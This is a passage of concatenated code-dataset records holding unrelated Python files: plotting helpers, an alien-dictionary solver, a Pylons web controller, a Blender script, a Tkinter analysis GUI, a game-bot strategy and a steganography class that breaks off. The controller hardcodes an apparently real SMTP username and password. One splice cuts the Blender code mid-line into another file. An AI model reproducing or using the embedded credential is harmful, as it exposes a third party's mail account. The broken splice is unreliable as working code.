subfig1 = fig.add_subplot(1,2,1)\n subfig1.imshow(image1)\n subfig1.set_title(title1)\n subfig2 = fig.add_subplot(1,2,2)\n subfig2.imshow(image2, cmap)\n subfig2.set_title(title2)\n if file not in ['empty']:\n mp.savefig('output_images/' + file + '.jpg', type=\"jpg\", bbox_inches='tight')\n plt.show()\n \ndef show_images_side_by_side3(image1, image2, image3, title1 =\"\", title2 = \"\", title3 = \"\", cmap='gray', file = \"empty\"):\n fig = plt.figure(figsize=(20,10))\n subfig1 = fig.add_subplot(1,3,1)\n subfig1.imshow(image1)\n subfig1.set_title(title1)\n subfig2 = fig.add_subplot(1,3,2)\n subfig2.imshow(image2)\n subfig2.set_title(title2)\n subfig3 = fig.add_subplot(1,3,3)\n subfig3.imshow(image3, cmap)\n subfig3.set_title(title3)\n if file not in ['empty']:\n mp.savefig('output_images/' + file + '.jpg', type=\"jpg\", bbox_inches='tight')\n plt.show()\n","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"64816903","text":"from collections import defaultdict\n\nclass Solution:\n \"\"\"\n @param words: a list of words\n @return: a string which is correct order\n \"\"\"\n def alienOrder(self, words):\n # Write your code here\n letter_after_graph = defaultdict(list) # Letter to letters after it.\n letter_before_count = defaultdict(int) # Count of letters before than it.\n for i in range(len(words)): \n for k in range(len(words[i])):\n if words[i][k] not in letter_before_count:\n letter_before_count[words[i][k]] = 0\n if i == len(words) - 1:\n continue\n j = 0\n while (\n j < len(words[i]) and\n j < len(words[i+1]) and\n words[i][j] == words[i+1][j]):\n j += 1\n if j < len(words[i]) and j < len(words[i+1]):\n letter_after_graph[words[i][j]] = words[i+1][j]\n letter_before_count[words[i+1][j]] += 1\n # Construct letter order based on letter graph.\n orders = []\n # Stores (letter, letter before)\n queue = [(l, None) for l, c in letter_before_count.items() if c == 0]\n while queue:\n l, l_before = queue.pop(0)\n # Insert into orders also need to consider human alphabetical order.:\n if l_before:\n idx = orders.index(l_before) + 1\n else:\n idx = 0\n while idx < len(orders) and orders[idx] < l:\n idx += 1\n orders.insert(idx, l)\n # Find next set of letters to visit.\n for l_after in letter_after_graph[l]:\n letter_before_count[l_after] -= 1\n if letter_before_count[l_after] == 0 and l_after not in orders:\n queue.append((l_after, l))\n\n if sum(letter_before_count.values()) == 0: \n return ''.join(orders)\n else:\n return ''","sub_path":"python3/l0269_alien_dictinary.py","file_name":"l0269_alien_dictinary.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"651461028","text":"# coding: utf-8\nfrom datetime import timedelta\nimport logging\nimport json\n\nfrom pylons import request, response, session, tmpl_context as c, url\nfrom pylons.decorators import jsonify\nfrom pylons.controllers.util import abort, redirect\n\nfrom parseryml.lib.base import BaseController, render\nfrom parseryml.model.baseModel import Base\nfrom parseryml.model.marketModel import MarketModel\nfrom parseryml.lib import helpers as h\n\n\nfrom parseryml.model.userModel import UserModel\nfrom parseryml.lib.tasks import parse_by_id\n\nimport smtplib\nfrom email.MIMEText import MIMEText\nfrom email.mime.application import MIMEApplication\nfrom email.mime.multipart import MIMEMultipart\n\nimport logging\nlog = logging.getLogger(__name__)\n\nclass ParserSettingsController(BaseController):\n def __init__(self):\n self.categories = None \n\n def index(self):\n if session.has_key('login'):\n if session['login']:\n return render('/parser_settings/parser.mako.html')\n else:\n return render('/login/login.mako.html')\n else:\n return render('/login/login.mako.html')\n\n def login(self):\n UM = UserModel()\n if UM.check_user_pwd(request.params.get('user_login'), request.params.get('user_password')):\n session['login'] = True\n session.save()\n else:\n session['login'] = False\n session.save()\n return u'Не верный Логин или пароль'\n\n def exit(self):\n if session.has_key('login'):\n session['login'] = False\n session.save()\n return\n\n def set_time_settings(self):\n MM = MarketModel()\n params = request.params.get('params', \"{}\")\n params = h.FJSON(params)\n if not params['interval']:\n params = None\n MM.set_time_settings(request.params.get('market_id'), params)\n return\n\n @jsonify\n def get_states(self):\n stack = request.params.getall('markets[]')\n market_ids = [0]\n for market_id in stack:\n market_ids.append(int(market_id))\n market = MarketModel()\n return {'states':market.get_states(market_ids)}\n\n @jsonify\n def get_markets(self):\n MM = MarketModel()\n limit = request.params.get('limit', 20)\n start = request.params.get('start', 0)\n sort_by = request.params.get('sort')\n sort_dir = request.params.get('dir')\n pattern = request.params.get('pattern', '')\n group = request.params.get('groupBy', '')\n if sort_dir == 'ASC':\n sort_dir = 1\n else:\n sort_dir = -1\n \n markets = MM.get_all(start, limit, sort_by, sort_dir, pattern, group)\n\n products = []\n\n total = MM.get_count(pattern)\n\n for market in markets:\n result = {\n 'id': market.get('id', \"\"),\n 'file_date': str(market.get('file_date', \"\")),\n 'date_create': str(market.get('dateCreate', \"\")),\n 'title': market.get('title', \"\"),\n 'status': market.get('state', \"\"),\n 'urlExport': market.get('urlExport', \"\"),\n 'urlMarket': market.get('urlMarket', \"\"),\n 'last_update': str(market.get('last_update', \"\")),\n 'time_setting': market.get('time_setting', \"\"),\n 'interval': market.get('interval', 0),\n 'status_id': market.get('status_id', 0),\n 'categories_count': 0,\n 'offers_count': 0,\n 'started': \"\",\n 'finished': \"\",\n 'delta': {},\n }\n\n categories = market.get('Categories', None)\n if categories is not None:\n result['categories_count'] = len(categories)\n\n offersModel = Base.get_offer_collection()\n result['offers_count'] = offersModel.find({'shopId':result['id']},{'title':1}).count()\n \n if result['interval'] == 0:\n if 'time_setting' in result and 'interval' in result['time_setting'] and 'interval_count' in result['time_setting']:\n argument = 0\n if result['time_setting']['interval'] == u'час':\n argument = 2400\n elif result['time_setting']['interval'] == u'день':\n argument = 100\n elif result['time_setting']['interval'] == u'месяц':\n argument = 10\n elif result['time_setting']['interval'] == u'год':\n argument = 1\n\n result['interval'] = argument * result['time_setting']['interval_count']\n\n data = {'id':result['id'], 'interval':result['interval']}\n MM.save(data)\n \n if 'status' in result and 'state' in result['status']:\n if 'started' in result['status']:\n result['started'] = str(result['status']['started'])\n if 'finished' in result['status']:\n result['finished'] = str(result['status']['finished'])\n\n delta = result['status']['finished'] - result['status']['started']\n result['delta'] = {\n 'days': delta.days,\n 'sec': delta.seconds\n }\n \n del result['status']['finished']\n \n del result['status']['started']\n\n if result['status']['state'] == 'finished':\n argument = 1\n elif result['status']['state'] == 'error':\n argument = 2\n elif result['status']['state'] == 'aborted':\n argument = 3\n elif result['status']['state'] == 'parsing':\n argument = 20\n elif result['status']['state'] == 'pending':\n argument = 5\n else:\n argument = 10\n else:\n argument = 10\n result['status'] = {'state':'new'}\n data = {'id':result['id'], 'state':result['status']}\n MM.save(data)\n\n if result['status_id'] != argument:\n result['status_id'] = argument\n data = {'id':result['id'], 'status_id':result['status_id']}\n MM.save(data)\n \n products.append(result)\n\n result = {\"total\": str(total), \"data\": products}\n\n session.save()\n\n return result\n\n @jsonify\n def start_parsing_market(self):\n market_id = int(request.params.get('market_id'))\n \n data = {\n 'id': market_id,\n 'state': {\n 'state':'parsing',\n }\n }\n \n market = MarketModel()\n market.save(data)\n\n parse_by_id.apply_async(args=[market_id], queue=\"parse_yml_task\", routing_key=\"parseryml.process\")\n return {'result': 'success'}\n\n def send_email(self, market_id, email):\n # отправитель\n me = 'rynok_parser@yottos.com'\n # получатель\n you = email\n # текст письма\n text = 'Это письмо к вам пришло потому что в файле выгрузки есть не валидные продукты список их прикреплен в файле'\n text = msg = MIMEText(text, _charset=\"utf-8\")\n # заголовок письма\n subj = 'Hello!!'\n # параметры SMTP-сервера\n server = \"yottos.com\" # \"smtp.mail.ru\"\n port = 26\n user_name = \"support@yottos.com\"\n user_passwd = \"57fd8824\"\n\n msg = MIMEMultipart()\n msg['Subject'] = subj\n msg['From'] = me\n msg['To'] = you\n\n path = 'parseryml/public/not_valid/' + str(market_id) + '.txt'\n attach = MIMEApplication(open(path, 'r').read())\n attach.add_header('Content-Disposition', 'attachment', filename='errors.txt')\n msg.attach(text)\n msg.attach(attach)\n\n s = smtplib.SMTP(server, port)\n s.starttls()\n s.set_debuglevel(5)\n s.login(user_name, user_passwd)\n s.sendmail(me, you, msg.as_string())\n s.quit()","sub_path":"pars-yml/parseryml/controllers/parser_settings.py","file_name":"parser_settings.py","file_ext":"py","file_size_in_byte":8566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"250665762","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nimport bpy\nimport imp\n\ncurve_helper = imp.load_source('curve_helper','curve_helper.py')\n#from . import curve_helper as curve_helper\n\n\nclass bulkhead:\n station=0\n the_hull_definition=None\n thickness=0.05\n bulkhead_object=None\n bulkhead_void_object=None\n bulkhead_collection=None\n bulkhead_void_collection=None\n\n def __init__(self,the_hull_definition,station_location):\n self.station=station_location\n self.the_hull_definition=the_hull_definition\n self.bulkhead_collection=curve_helper.make_collection(\"bulkheads\",bpy.context.scene.collection.children)\n self.bulkhead_void_collection=curve_helper.make_collection(\"bulkhead_void\",bpy.context.scene.collection.children)\n\n #curve_helper.hide_object(self.bulkhead_void_collection)\n\n import bpy\n\n def move_verts_z(self,ob,new_val):\n\n vert_list=[]\n\n for v in ob.data.vertices:\n #print(v.index) \n #print(v.co.z)\n \n vert_list.append([v.index,v.co.z])\n \n # print(\"presort\")\n # for v in vert_list:\n # print(\"%d %f\" % (v[0],v[1]))\n \n\n def secondVal(val):\n return val[1]\n\n vert_list.sort(key=secondVal)\n\n # print(\"postsort\")\n # for v in vert_list:\n # print(\"%d %f\" % (v[0],v[1]))\n\n mat_world = ob.matrix_world\n #print(\"world: %s\"%mat_world)\n \n for i in range(0,len(vert_list)):\n # for i in range(0,filter_lowest):\n #print(\" \")\n vert=ob.data.vertices[vert_list[i][0]].co\n #print(\"vert %d: %s\"%(i,vert_list[i]))\n #vert.z=0\n \n pos_world = mat_world @ vert\n #print(\"world original: %s\"%pos_world)\n \n if pos_world.z 5:\n if path[-5:] != \".xlsx\":\n path = path + \".xlsx\"\n\n analysis.exportStatistics(entry.get())\n root.destroy()\n\n\ndef analysisGUI(analysis):\n stats = analysis.calcStatistics()\n root = tk.Tk()\n root.title(\"Delta Analysis Details\")\n\n titleFont = tkFont.Font(size=15)\n dataFont = tkFont.Font(size=12)\n\n frame1 = tk.Frame(root, padx=5, pady=5)\n frame1.pack()\n tk.Label(frame1, text=\"Delta Analysis Details\", font=titleFont).pack()\n\n frame2 = tk.Frame(frame1, padx=1, pady=5)\n frame2.pack()\n tk.Label(frame2, text=\"Total Primary: \" + str(stats[0]), font=dataFont, anchor='w').pack(fill=tk.X)\n tk.Label(frame2, text=\"Total Secondary: \" + str(stats[1]), font=dataFont, anchor='w').pack(fill=tk.X)\n tk.Label(frame2, text=\"Accurate: \" + str(stats[2]), font=dataFont, anchor='w').pack(fill=tk.X)\n tk.Label(frame2, text=\"Percentage: \" + str(stats[3]) + \"%\", font=dataFont, anchor='w').pack(fill=tk.X)\n tk.Label(frame2, text=\"Underread: \" + str(stats[4]), font=dataFont, anchor='w').pack(fill=tk.X)\n tk.Label(frame2, text=\"Percentage: \" + str(stats[5]) + \"%\", font=dataFont, anchor='w').pack(fill=tk.X)\n tk.Label(frame2, text=\"Overread: \" + str(stats[6]), font=dataFont, anchor='w').pack(fill=tk.X)\n tk.Label(frame2, text=\"Percentage: \" + str(stats[7]) + \"%\", font=dataFont, anchor='w').pack(fill=tk.X)\n\n tk.Label(root, text=\"File Path: \", font=dataFont, width=12).pack()\n frame_file = tk.Frame(root, padx=5, pady=5)\n frame_file.pack(fill=tk.X)\n entry = tk.Entry(frame_file, width=30)\n entry.pack(fill=tk.BOTH, expand=True, side=tk.LEFT, padx=5, pady=5)\n tk.Button(frame_file, text=\"Choose Path\", command=partial(saveFileDialog, entry)).pack(side=tk.LEFT)\n\n tk.Button(root, text=\"Export Data\", font=dataFont, command=partial(exportAnalysis, root, analysis, entry)).pack(side=tk.BOTTOM, pady=5)\n\n root.update()\n root.minsize(root.winfo_width(), root.winfo_height())\n root.mainloop()\n print(\"Analysis\")\n\n\ndef Delta_Analysis(root, entry1, entry2, var):\n path1 = entry1.get()\n path2 = entry2.get()\n type1 = Delta_Module.File_Type.ATT if (var.get() == 2) else Delta_Module.File_Type.DELTA\n type2 = Delta_Module.File_Type.DELTA if (var.get() == 2) else Delta_Module.File_Type.ATT\n\n primaryCSV = Delta_Module.Delta_Dataframe(\"Primary CSV\", path1, type1)\n secondaryCSV = Delta_Module.Delta_Dataframe(\"Secondary CSV\", path2, type2)\n print(secondaryCSV.data_frame)\n\n analysis = Delta_Module.Delta_Analysis(\"Analysis\", primaryCSV, secondaryCSV)\n analysis.printStatistics()\n\n root.destroy()\n analysisGUI(analysis)\n\n\ndef fileGUI():\n root = tk.Tk()\n root.title(\"Delta Analysis Software\")\n var1 = tk.IntVar()\n titleFont = tkFont.Font(size=15)\n buttonFont = tkFont.Font(size=12)\n\n tk.Label(root, text=\"Delta Analysis Software\", font=titleFont).pack()\n\n frame_file1 = tk.Frame(root, padx=5, pady=5)\n frame_file1.pack(fill=tk.X)\n tk.Label(frame_file1, text=\"Primary File\", font=buttonFont, width=12).pack(side=tk.LEFT)\n entry1 = tk.Entry(frame_file1, width=30)\n entry1.pack(fill=tk.BOTH, expand=True, side=tk.LEFT, padx=5, pady=5)\n tk.Button(frame_file1, text=\"Select File\", command=partial(openFileDialog, entry1)).pack(side=tk.LEFT)\n\n frame_settings1 = tk.Frame(root, padx=5, pady=5)\n frame_settings1.pack()\n radio1_delta = tk.Radiobutton(frame_settings1, text=\"Delta\", variable=var1, value=1)\n radio1_att = tk.Radiobutton(frame_settings1, text=\"ATT\", variable=var1, value=2)\n radio1_delta.pack(side=tk.LEFT, fill=tk.X)\n radio1_att.pack(side=tk.RIGHT, fill=tk.X)\n\n frame_file2 = tk.Frame(root, padx=5, pady=5)\n frame_file2.pack(fill=tk.X)\n tk.Label(frame_file2, text=\"Secondary File\", font=buttonFont, width=12).pack(side=tk.LEFT)\n entry2 = tk.Entry(frame_file2, width=30)\n entry2.pack(fill=tk.BOTH, expand=True, side=tk.LEFT, padx=5, pady=5)\n tk.Button(frame_file2, text=\"Select File\", command=partial(openFileDialog, entry2)).pack(side=tk.LEFT)\n\n frame_settings2 = tk.Frame(root, padx=5, pady=5)\n frame_settings2.pack()\n radio2_delta = tk.Radiobutton(frame_settings2, text=\"Delta\", variable=var1, value=2)\n radio2_att = tk.Radiobutton(frame_settings2, text=\"ATT\", variable=var1, value=1)\n radio2_delta.pack(side=tk.LEFT, fill=tk.X)\n radio2_att.pack(side=tk.RIGHT, fill=tk.X)\n\n tk.Button(root, text=\"Perform Analysis\", command=partial(Delta_Analysis, root, entry1, entry2, var1)).pack(side=tk.BOTTOM, pady=5)\n\n root.update()\n root.minsize(root.winfo_width(), root.winfo_height())\n root.mainloop()\n\n\ndef HnM_Main():\n def parseGroup(title, path, typ, amount):\n group = []\n for i in range(1, amount+1):\n group.append(HnM_Module.HnM_Dataframe(title.format(i), path.format(i), typ))\n return group\n\n Master_Floor = HnM_Module.HnM_Dataframe(\"HNM_SalesFloor_CSV\",\n \"../files/HnM/read/MASTERFILE_Complete.xlsx\",\n HnM_Module.File_Type.Expected_SalesFloor)\n Master_Floor.writeCSV()\n\n Master_Stock = HnM_Module.HnM_Dataframe(\"HNM_StockRoom_CSV\",\n \"../files/HnM/read/MASTERFILE_Complete.xlsx\",\n HnM_Module.File_Type.Expected_StockRoom)\n Master_Stock.writeCSV()\n\n\ndef Delta_Main():\n date = [12, 10, 2019]\n String = \"../Delta Files/read/2019{0}{1}_BSM_PIER2.csv\".format(str(date[0]).zfill(2), str(date[1]).zfill(2))\n deltaCSV = Delta_Module.Delta_Dataframe(\"Delta CSV\", String,\n Delta_Module.File_Type.DELTA)\n\n attCSV = Delta_Module.Delta_Dataframe(\"ATT CSV\", \"../Delta Files/read/Delta_AU_EBT Data_BR_AT_{0}{1}19__PT_0259.csv\".format(\n str(date[0]).zfill(2), str(date[1]+1).zfill(2)),\n Delta_Module.File_Type.ATT)\n\n # print(\"Analysis for {0}/{1}/{2}\\n\".format(date[0], date[1], date[2]))\n delta_analysis = Delta_Module.Delta_Analysis(\"Delta based Accuracy {0}-{1}-{2}\".format(date[0], date[1], date[2]),\n deltaCSV, attCSV)\n # delta_analysis.printStatistics()\n # print()\n att_analysis = Delta_Module.Delta_Analysis(\"AT&T based Accuracy {0}-{1}-{2}\".format(date[0], date[1], date[2]),\n attCSV, deltaCSV)\n # att_analysis.printStatistics()\n # print()\n\n delta_analysis.exportStatistics(\"../Delta Files/write/{0}.xlsx\".format(delta_analysis.title))\n\n analysisGUI(delta_analysis)\n\n\nDelta_Main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"507338738","text":"#!/user/bin/env python\n# -*- coding: UTF-8 -*-\n'''\nThis python script main purpose is to change you data line in reading data process(you needn't to change your original data),\ntransform function change original line to new lines.\n\ncan used for:\n 1. change other data format to ytk-learn data format\n 2. feature transform/scale, features cartesian product, generating polynomial features(x1, x2, x3) -> (x1, x2, x3, x1x2, x1x3, x2x3, x1x2x3)\n 3. change sample weight\n 4. samples sampling, e.g. negative samples sampling\n 5. generate multi lines\n 6. you can use sklearn, pandas... powerful third libs to handle your data\n'''\n\n# line -> lines, if this line is filtered, return []\ndef transform(bytesarr):\n # don't delete this code\n line = bytesarr.decode(\"utf-8\")\n # custom code here\n # ...\n cols = line.split(' ')\n label = cols[0]\n feas = ','.join(cols[1:])\n new_line = '###'.join(['1', label, feas])\n return [new_line]","sub_path":"demo/gbdt/regression_l2/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"71279561","text":"import gamelib\nimport random\nimport math\nimport statistics\nfrom sys import maxsize\n\n\n'''\nMost of the algo code you write will be in this file unless you create new\nmodules yourself. Start by modifying the 'on_turn' function.\n\nAdvanced strategy tips:\n\nAdditional functions are made available by importing the AdvancedGameState\nclass from gamelib/advanced.py as a replcement for the regular GameState class\nin game.py.\n\nYou can analyze action frames by modifying algocore.py.\n\nThe GameState.map object can be manually manipulated to create hypothetical\nboard states. Though, we recommended making a copy of the map to preserve\nthe actual current map state.\n'''\n\nclass AlgoStrategy(gamelib.AlgoCore):\n def __init__(self):\n super().__init__()\n random.seed()\n\n def on_game_start(self, config):\n '''\n Read in config and perform any initial setup here\n '''\n gamelib.debug_write('Configuring your custom algo strategy...')\n self.config = config\n global FILTER, ENCRYPTOR, DESTRUCTOR, PING, EMP, SCRAMBLER\n FILTER = config[\"unitInformation\"][0][\"shorthand\"]\n ENCRYPTOR = config[\"unitInformation\"][1][\"shorthand\"]\n DESTRUCTOR = config[\"unitInformation\"][2][\"shorthand\"]\n PING = config[\"unitInformation\"][3][\"shorthand\"]\n EMP = config[\"unitInformation\"][4][\"shorthand\"]\n SCRAMBLER = config[\"unitInformation\"][5][\"shorthand\"]\n\n def on_turn(self, cmd):\n '''\n This function is called every turn with the game state wrapper as\n an argument. The wrapper stores the state of the arena and has methods\n for querying its state, allocating your current resources as planned\n unit deployments, and transmitting your intended deployments to the\n game engine.\n '''\n game_state = gamelib.GameState(self.config, cmd)\n gamelib.debug_write('Performing turn {} of your custom algo strategy'.format(game_state.turn_number))\n\n self.starter_strategy(game_state)\n\n game_state.submit_turn()\n\n '''\n NOTE: All the methods after this point are part of the sample starter-algo\n strategy and can safey be replaced for your custom algo.\n '''\n def starter_strategy(self, game_state):\n '''\n Build the C1 logo. Calling this method first prioritises\n resources to build and repair the logo before spending them\n on anything else.\n '''\n self.build_c1_logo(game_state)\n\n '''\n Then build additional defenses.\n '''\n self.build_defences(game_state)\n\n '''\n Finally deploy our information units to attack.\n '''\n self.deploy_attackers(game_state)\n\n # Here we make the C1 Logo!\n def build_c1_logo(self, game_state):\n '''\n We use Filter firewalls because they are cheap\n\n First, we build the letter C.\n '''\n\n\n tower_locations_filter = [[6, 11], [6, 9], [10, 6], [16, 6], [20, 9], [20, 11]]\n game_state.attempt_spawn(FILTER, tower_locations_filter)\n tower_locations_destruct = [[3, 12], [8, 8], [13, 10], [19, 7], [23, 12]]\n game_state.attempt_spawn(DESTRUCTOR, tower_locations_destruct)\n tower_locations_encrypt = [[13, 5]]\n game_state.attempt_spawn(ENCRYPTOR, tower_locations_encrypt)\n\n self.prev_starting_bits = game_state.get_resource(game_state.BITS)\n self.prev_enemy_bits = game_state.get_resource(game_state.BITS, 1)\n self.prev_starting_cores = game_state.get_resource(game_state.CORES)\n self.prev_enemy_cores = game_state.get_resource(game_state.CORES, 1)\n self.prev_current_health = game_state.my_health\n self.prev_enemy_health = game_state.enemy_health\n self.prev_health = game_state.enemy_health\n self.prev_all_locations = [[]]\n\n def build_defences(self, game_state):\n\n current_health = game_state.my_health\n '''\n First lets protect ourselves a little with destructors:\n '''\n firewall_locations = [[0, 13], [27, 13]]\n game_state.attempt_spawn(DESTRUCTOR, firewall_locations)\n\n '''\n Then lets boost our offense by building some encryptors to shield\n our information units. Lets put them near the front because the\n shields decay over time, so shields closer to the action\n are more effective.\n '''\n firewall_locations = [[3, 11], [4, 11], [5, 11]]\n game_state.attempt_spawn(ENCRYPTOR, firewall_locations)\n\n '''\n Lastly lets build encryptors in random locations. Normally building\n randomly is a bad idea but we'll leave it to you to figure out better\n strategies.\n\n First we get all locations on the bottom half of the map\n that are in the arena bounds.\n '''\n all_locations = []\n for i in range(game_state.ARENA_SIZE):\n for j in range(math.floor(game_state.ARENA_SIZE / 2)):\n if (game_state.game_map.in_arena_bounds([i, j])):\n all_locations.append([i, j])\n\n '''\n Then we remove locations already occupied.\n '''\n possible_locations = self.filter_blocked_locations(all_locations, game_state)\n\n destroyed_locations_x = []\n destroyed_locations = [[]]\n\n if ((self.prev_current_health - current_health) > 0):\n if (len(self.prev_all_locations)>0):\n if (len(possible_locations) > len(self.prev_all_locations)):\n # if there are more available locations then there were\n for x in possible_locations:\n if x not in self.prev_all_locations:\n destroyed_locations_x.append(x[0])\n destroyed_locations.append(x)\n\n\n if statistics.stdev(destroyed_locations_x) < 4:\n game_state.attempt_spawn(DESTRUCTOR, destroyed_locations_x[0])\n else:\n for x in destroyed_locations:\n game_state.attempt_spawn(FILTER, x)\n\n\n '''\n While we have cores to spend, build a random Encryptor.\n '''\n while game_state.get_resource(game_state.CORES) >= game_state.type_cost(ENCRYPTOR) and len(possible_locations) > 0:\n # Choose a random location.\n location_index = random.randint(0, len(possible_locations) - 1)\n build_location = possible_locations[location_index]\n '''\n Build it and remove the location since you can't place two\n firewalls in the same location.\n '''\n game_state.attempt_spawn(ENCRYPTOR, build_location)\n possible_locations.remove(build_location)\n\n self.prev_all_locations = possible_locations\n\n def deploy_attackers(self, game_state):\n\n\n starting_bits = game_state.get_resource(game_state.BITS)\n bits_to_spend = starting_bits\n enemy_bits = game_state.get_resource(game_state.BITS, 1)\n current_health = game_state.my_health\n enemy_health = game_state.enemy_health\n friendly_edges = game_state.game_map.get_edge_locations(game_state.game_map.BOTTOM_LEFT) + game_state.game_map.get_edge_locations(game_state.game_map.BOTTOM_RIGHT)\n deploy_locations = self.filter_blocked_locations(friendly_edges, game_state)\n\n #While we still want to spend more bits, deploy a random information unit\n while bits_to_spend >= 1 and len(deploy_locations) > 0:\n ping_value = 1\n scrambler_value = 1\n emp_value = 1\n\n #Stop if values were set below zero\n if ping_value + scrambler_value + emp_value < 1:\n break\n\n #Choose a random deploy location\n deploy_index = random.randint(0, len(deploy_locations) - 1)\n deploy_location = deploy_locations[deploy_index]\n\n #Adjust weights slightly based on game state\n if enemy_health <= 5:\n ping_value *= 2\n\n if enemy_bits > starting_bits or current_health <= 5:\n scrambler_value *= 2\n if bits_to_spend < 3:\n emp_value = 0\n\n deploy_location = [0,0]\n #Choose a random unit based on weights, higher weights are more likely to be chosen\n if ((self.prev_enemy_bits - enemy_bits) > enemy_bits*.3):\n unit_to_spawn = EMP\n deploy_location = deploy_locations[int(len(deploy_locations)/2)]\n bits_to_spend -= 3\n elif ((self.prev_enemy_health - enemy_health) > 0):\n deploy_location = self.prev_deploy_location\n unit_to_spawn = PING\n bits_to_spend -= 1\n elif ((self.prev_enemy_health - enemy_health) == 0 and game_state.turn_number > 2):\n deploy_location = self.prev_deploy_location\n unit_to_spawn = SCRAMBLER\n bits_to_spend -= 1\n else:\n deploy_index = random.randint(0, len(deploy_locations) - 1)\n deploy_location = deploy_locations[deploy_index]\n unit_to_spawn = PING\n bits_to_spend -= 1\n self.prev_deploy_location = deploy_location\n\n\n game_state.attempt_spawn(unit_to_spawn, deploy_location)\n\n self.prev_starting_bits = game_state.get_resource(game_state.BITS)\n self.prev_enemy_bits = game_state.get_resource(game_state.BITS, 1)\n self.prev_starting_cores = game_state.get_resource(game_state.CORES)\n self.prev_enemy_cores = game_state.get_resource(game_state.CORES, 1)\n self.prev_current_health = game_state.my_health\n self.prev_enemy_health = game_state.enemy_health\n self.prev_health = game_state.my_health\n\n\n def filter_blocked_locations(self, locations, game_state):\n filtered = []\n for location in locations:\n if not game_state.contains_stationary_unit(location):\n filtered.append(location)\n return filtered\n\nif __name__ == \"__main__\":\n algo = AlgoStrategy()\n algo.start()\n","sub_path":"script1/algo_strategy.py","file_name":"algo_strategy.py","file_ext":"py","file_size_in_byte":10110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"458536680","text":"import cv2\nimport numpy as np\nimport io\nimport math\n\nclass CPT:\n\n def convertImageToBinaryMatrix(self, path):\n np_img = self.convertImageToBinaryImage(path)\n return np.where(np_img == 255, 1, 0)\n\n def convertImageToBinaryImage(self, path):\n img = cv2.imread(path, 0)\n mat, bw = cv2.threshold(img, 127,255, cv2.THRESH_BINARY)\n return np.array(bw)#black and white\n\n def convertBinaryMatrixToBinaryImage(self, matrix):\n matrix = np.where(matrix == 1, 255, 0)\n return matrix\n\n def convertMatrixToImage(self, matrix, path):\n cv2.imwrite(path, matrix)\n\n def convertTextToBinary(self, s):\n st = ' '.join(format(ord(x), '08b') for x in s)\n return st\n\n def matrixMul(self, m1, m2):\n rs = []\n for i in range(len(m1)):\n ar = []\n for j in range(len(m1)):\n if m1[i][j] == 0:\n ar.append(0)\n else:\n ar.append(m2[i][j])\n rs.append(ar)\n return rs\n\n def maxTrixChangeBit(self, m, pos):\n m = np.array(m)\n for i in range(len(pos)):\n x = pos[i][0]\n y = pos[i][1]\n\n val = 0\n if m[x][y] == 0:\n val = 1\n m[x][y] = val\n\n return np.matrix(m)\n\n def encode(self, f, k, w, bit):\n t = np.array(np.bitwise_xor(f, k))\n #convert matrix to array\n f = np.array(f)\n k = np.array(k)\n #sum * w\n s = self.matrixMul(t, w)\n\n #sum s\n su = np.sum(s)\n\n #get d\n d = (int(bit, 2) - su) % pow(2, len(bit))\n posBitwise = []\n r = len(bit)\n\n if d != 0:\n jk = self.calcS(w,t,d,r)\n if jk is not None:\n posBitwise.append(jk)\n else:\n #tim so tu nhien h in {1,2,3,..2r-1} nho nhat sao cho Shd != null va Sd-hd != null\n for h in range(1,pow(2,r) - 1):\n jk = self.calcS(w,t,h,r)\n if jk is not None:\n h2 = pow(2,r) + (d-h)\n uv = self.calcS(w,t,h2,r)\n if uv is not None:\n posBitwise.append(jk)\n posBitwise.append(uv)\n break\n\n return self.maxTrixChangeBit(f,posBitwise)\n\n def calcS(self, w, t, d, r):\n for i in range(len(t)):\n if d in w[i]:\n pos = w[i].index(d)\n if t[i][pos] == 0:\n return [i, pos]\n elif (pow(2, r) - d) in w[i]:\n pos = w[i].index((pow(2, r) - d))\n if t[i][pos] == 1:\n return [i, pos]\n return None\n\n def decode(self, f, k, w, r):\n\n t = np.array(np.bitwise_xor(f, k))\n # convert matrix to array\n f = np.array(f)\n k = np.array(k)\n w = np.array(w)\n\n # sum\n t = np.array(t)\n\n # sum * w\n s = self.matrixMul(t, w)\n\n # sum s\n su = np.sum(s)\n\n # print(su % (pow(2,)))\n result = (su % (pow(2, r)))\n return format(result, '08b')\n\n def runEncode(self, pathImg, pathText ):\n fo = io.open(pathText, \"r\", encoding=\"utf8\")\n text = fo.read()\n fo.close()\n\n f_matrix = self.convertImageToBinaryMatrix(pathImg)\n ele = 16\n\n if text == \"\":\n return self.convertBinaryMatrixToBinaryImage(f_matrix)\n else:\n dh = f_matrix.shape[0] - (f_matrix.shape[0] % 16) #height\n dw = f_matrix.shape[1] - (f_matrix.shape[1] % 16) #width\n rest = int(((dh * dw) /(ele*ele)) - len(text) - len(codeToEndDecode))\n if(rest >= 0):\n text = text + codeToEndDecode\n else:\n rest = len(codeToEndDecode) + rest\n for i in range(0, rest):\n text = text + \" \"\n\n st = self.convertTextToBinary(text).split(\" \")\n\n x = 0\n y = 0\n i = 0\n\n max_size_h = f_matrix.shape[1]\n max_size_v = f_matrix.shape[0]\n\n\n sss = \"\"\n for bit in st:\n\n f 